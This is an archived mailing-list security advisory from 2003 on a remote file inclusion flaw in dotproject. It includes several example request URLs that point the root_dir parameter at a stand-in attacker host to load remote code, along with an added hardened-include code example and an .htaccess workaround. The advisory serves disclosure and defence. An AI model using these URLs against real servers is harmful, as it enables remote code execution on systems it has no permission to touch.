dotproject Remote Code Execution Vulnerability

From: mindwarperat_private
Date: Wed Jan 29 2003 - 04:02:24 PST


    dotproject Remote Code Execution Vulnerability (By Mindwarper) 
    
    <------- -------> 
    
    ---------------------- 
    Vendor Information: 
    ---------------------- 
    
    Homepage : http://www.dotproject.net 
    Vendor : informed 
    Mailed advisory: 28/01/03 
    Vendor Response : None 
    
    
    ---------------------- 
    Affected Versions: 
    ---------------------- 
    
    dev20030121 
    
    
    ---------------------- 
    Vulnerability: 
    ---------------------- 
    
    
    dotproject is a PHP+MySQL beta-level web-based project management and tracking tool 
    that dotmarketing started in Dec. 2000. 
    Inside the /modules/ directory, multiple files include classdefs/date.php by way of 
    the variable $root_dir without defining it first. When register_globals is enabled, 
    a remote attacker can set $root_dir from the request and point the include at a 
    server under their control (remote file inclusion). 
    
    Example Code from modules/projects/addedit.php: 
    
    ****** 
    
    <?php 
    ## 
    ## Files modules: index page re-usable sub-table 
    ## 
    
    require_once( "$root_dir/classdefs/date.php" );   ## $root_dir is never assigned in this file 
    $df = $AppUI->getPref('SHDATEFORMAT'); 
    $tf = $AppUI->getPref('TIMEFORMAT'); 
    
    ****** 
    
    As you can see, nothing runs before the require_once call and $root_dir is never 
    assigned in the file, so with register_globals on an attacker can supply it in the 
    query string and include a remote file. 
    
    Example: 
    
    http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker 
    
    The same works on: 
    
    http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker 
    http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker 
    http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker 
    http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker 
    http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker 
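    The following is a hardened include prologue for a module file such as modules/projects/addedit.php. It is an added example and not dotProject's own code; it assumes that the application's front controller (index.php) defines a constant, here called DP_BASE_DIR, holding the application root before it includes any module file (the constant name is an assumption for this example). The block goes beyond the page in one respect: it removes the dependence on register_globals altogether by deriving $root_dir from the file's own location and refusing direct requests.

```php
<?php
## Hardened include prologue for modules/projects/addedit.php (added example,
## not dotProject's code). Assumes index.php defines DP_BASE_DIR (assumed name)
## with the application root before including module files.

## 1. Reject direct requests to the module file. A constant cannot be set from
##    the query string even with register_globals on, unlike a plain variable
##    such as $root_dir, so this check holds regardless of that setting.
if (!defined('DP_BASE_DIR')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Module files cannot be accessed directly.');
}

## 2. Derive the application root from this file's own location instead of
##    trusting whatever $root_dir may already hold. modules/<module>/<file>.php
##    sits two directories below the application root.
$root_dir = realpath(dirname(__FILE__) . '/../..');

## 3. Sanity-check the result: it must be a local directory and must equal the
##    root the front controller established. A request-supplied value such as
##    "http://attacker" never reaches this point, and realpath() returns false
##    for anything that is not an existing local path.
if ($root_dir === false || !is_dir($root_dir) || $root_dir !== realpath(DP_BASE_DIR)) {
    exit('Invalid application root.');
}

require_once($root_dir . '/classdefs/date.php');
$df = $AppUI->getPref('SHDATEFORMAT');
$tf = $AppUI->getPref('TIMEFORMAT');
?>
```

    The same prologue applies to every module file listed above, since each of them reads $root_dir before assigning it. Disabling register_globals in php.ini removes the injection vector for the whole application at once, but the prologue keeps the files safe even on hosts where that setting cannot be changed.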
    
    
    ---------------------- 
    Solution: 
    ---------------------- 
    
    Please check the vendor's website for new patches. 
    
    As a temporary workaround, create a .htaccess file containing 'Deny from all' and place 
    it in the /modules/ directory; this blocks remote users from requesting the module files 
    directly. The .htaccess rule only takes effect if the directory is covered by 
    'AllowOverride Limit' (or 'All') in the Apache configuration. It does not affect the 
    application's own includes, which go through the filesystem rather than HTTP, so 
    dotproject keeps working through index.php. 
    
    
    ---------------------- 
    Contact: 
    ---------------------- 
    
    Name: Mindwarper 
    Email: mindwarperat_private 
    Website: http://mindlock.bestweb.net 
    
    
    <------- -------> 
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Wed Jan 29 2003 - 05:50:06 PST